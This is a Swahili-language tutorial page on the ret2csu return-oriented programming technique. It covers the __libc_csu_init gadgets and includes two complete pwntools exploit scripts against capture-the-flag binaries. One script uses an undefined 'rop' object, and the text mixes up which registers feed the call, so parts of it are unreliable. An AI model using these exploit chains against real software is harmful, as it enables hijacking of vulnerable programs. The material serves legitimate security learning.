Ret2csu

Reading time: 6 minutes

https://www.scs.stanford.edu/brop/bittau-brop.pdfTaarifa za Msingi

ret2csu ni mbinu ya udukuzi inayotumika unapojaribu kuchukua udhibiti wa programu lakini huwezi kupata gadgets unazotumia kawaida kubadilisha tabia ya programu.

Wakati programu inatumia maktaba fulani (kama libc), ina baadhi ya kazi zilizojengwa ndani kwa ajili ya kusimamia jinsi vipande tofauti vya programu vinavyowasiliana. Kati ya kazi hizi kuna vito vya siri ambavyo vinaweza kutenda kama gadgets zetu zinazokosekana, hasa moja inayoitwa __libc_csu_init.

Gadgets za Uchawi katika __libc_csu_init

Katika __libc_csu_init, kuna mfuatano mbili za maagizo (gadgets) za kuangazia:

1. Mfuatano wa kwanza unaturuhusu kuweka thamani katika register kadhaa (rbx, rbp, r12, r13, r14, r15). Hizi ni kama nafasi ambapo tunaweza kuhifadhi nambari au anwani tunazotaka kutumia baadaye.

pop rbx;
pop rbp;
pop r12;
pop r13;
pop r14;
pop r15;
ret;

Hii gadget inatuwezesha kudhibiti hizi register kwa kupop values kutoka kwenye stack kuingia ndani yao.

2. Mfululizo wa pili unatumia values tulizoweka kufanya mambo kadhaa:

• Hamisha values maalum kwenye register nyingine, na kuziandaa kwa ajili yetu kuzitumia kama parameters katika functions.
• Fanya wito kwa eneo lililopangwa kwa kujumlisha values katika r15 na rbx, kisha kuzidisha rbx kwa 8.

mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];

3. Labda hujui anwani yoyote ya kuandika hapo na unahitaji amri ya ret. Kumbuka kwamba gadget ya pili pia itamalizika kwa ret, lakini utahitaji kutimiza baadhi ya masharti ili kufikia hiyo:

mov rdx, r15;
mov rsi, r14;
mov edi, r13d;
call qword [r12 + rbx*8];
add rbx, 0x1;
cmp rbp, rbx
jnz <func>
...
ret

Hali zitakuwa:

• [r12 + rbx*8] lazima iwe inaelekeza kwenye anwani inayoifadhi kazi inayoweza kuitwa (ikiwa huna wazo na hakuna pie, unaweza tu kutumia kazi ya _init):
• Ikiwa _init iko kwenye 0x400560, tumia GEF kutafuta kiashiria katika kumbukumbu kwake na ufanye [r12 + rbx*8] kuwa anwani yenye kiashiria cha _init:

# Example from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
gef➤  search-pattern 0x400560
[+] Searching '\x60\x05\x40' in memory
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x400000-0x401000), permission=r-x
0x400e38 - 0x400e44  →   "\x60\x05\x40[...]"
[+] In '/Hackery/pod/modules/ret2_csu_dl/ropemporium_ret2csu/ret2csu'(0x600000-0x601000), permission=r--
0x600e38 - 0x600e44  →   "\x60\x05\x40[...]"

• rbp na rbx lazima wawe na thamani sawa ili kuepuka kuruka
• Kuna baadhi ya pops zilizokosekana unahitaji kuzingatia

RDI na RSI

Njia nyingine ya kudhibiti rdi na rsi kutoka kwa ret2csu gadget ni kwa kufikia offsets maalum:

Angalia ukurasa huu kwa maelezo zaidi:

{{#ref}} brop-blind-return-oriented-programming.md {{#endref}}

Mfano

Kutumia wito

Fikiria unataka kufanya syscall au kuita kazi kama write() lakini unahitaji thamani maalum katika register za rdx na rsi kama vigezo. Kawaida, ungeangalia gadgets ambazo zinaweka register hizi moja kwa moja, lakini huwezi kupata yoyote.

Hapa ndipo ret2csu inapoingia:

1. Weka Register: Tumia gadget ya kwanza ya kichawi kutoa thamani kutoka kwenye stack na kuingia rbx, rbp, r12 (edi), r13 (rsi), r14 (rdx), na r15.
2. Tumia Gadget ya Pili: Ukiwa na register hizo zimewekwa, unatumia gadget ya pili. Hii inakuwezesha kuhamasisha thamani zako ulizochagua katika rdx na rsi (kutoka r14 na r13, mtawalia), ukitayarisha vigezo kwa wito wa kazi. Zaidi ya hayo, kwa kudhibiti r15 na rbx, unaweza kufanya programu iite kazi iliyoko kwenye anwani unayoihesabu na kuweka katika [r15 + rbx*8].

Una mfano wa kutumia mbinu hii na kuielezea hapa, na hii ndiyo exploit ya mwisho iliyotumika:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

POP_CHAIN = 0x00401224 # pop r12, r13, r14, r15, ret
REG_CALL = 0x00401208  # rdx, rsi, edi, call [r15 + rbx*8]
RW_LOC = 0x00404028

rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0)                      # r12
rop.raw(0)                      # r13
rop.raw(0xdeadbeefcafed00d)     # r14 - popped into RDX!
rop.raw(RW_LOC)                 # r15 - holds location of called function!
rop.raw(REG_CALL)               # all the movs, plus the call

p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))            # send to gets() so it's written
print(p.recvline())                        # should receive "Awesome work!"

Kupita simu na kufikia ret

Exploit ifuatayo ilitolewa kutoka kwenye ukurasa huu ambapo ret2csu inatumika lakini badala ya kutumia simu, in kupita kulinganisha na kufikia ret baada ya simu:

# Code from https://guyinatuxedo.github.io/18-ret2_csu_dl/ropemporium_ret2csu/index.html
# This exploit is based off of: https://www.rootnetsec.com/ropemporium-ret2csu/

from pwn import *

# Establish the target process
target = process('./ret2csu')
#gdb.attach(target, gdbscript = 'b *    0x4007b0')

# Our two __libc_csu_init rop gadgets
csuGadget0 = p64(0x40089a)
csuGadget1 = p64(0x400880)

# Address of ret2win and _init pointer
ret2win = p64(0x4007b1)
initPtr = p64(0x600e38)

# Padding from start of input to saved return address
payload = "0"*0x28

# Our first gadget, and the values to be popped from the stack

# Also a value of 0xf means it is a filler value
payload += csuGadget0
payload += p64(0x0) # RBX
payload += p64(0x1) # RBP
payload += initPtr # R12, will be called in `CALL qword ptr [R12 + RBX*0x8]`
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xdeadcafebabebeef) # R15 > soon to be RDX

# Our second gadget, and the corresponding stack values
payload += csuGadget1
payload += p64(0xf) # qword value for the ADD RSP, 0x8 adjustment
payload += p64(0xf) # RBX
payload += p64(0xf) # RBP
payload += p64(0xf) # R12
payload += p64(0xf) # R13
payload += p64(0xf) # R14
payload += p64(0xf) # R15

# Finally the address of ret2win
payload += ret2win

# Send the payload
target.sendline(payload)
target.interactive()

Kwa Nini Usitumie libc Moja kwa Moja?

Kawaida kesi hizi pia zina udhaifu wa ret2plt + ret2lib, lakini wakati mwingine unahitaji kudhibiti vigezo zaidi kuliko vile vinavyoweza kudhibitiwa kwa urahisi na gadgets unazozipata moja kwa moja katika libc. Kwa mfano, kazi ya write() inahitaji vigezo vitatu, na kupata gadgets za kuweka yote haya moja kwa moja huenda isiwezekane.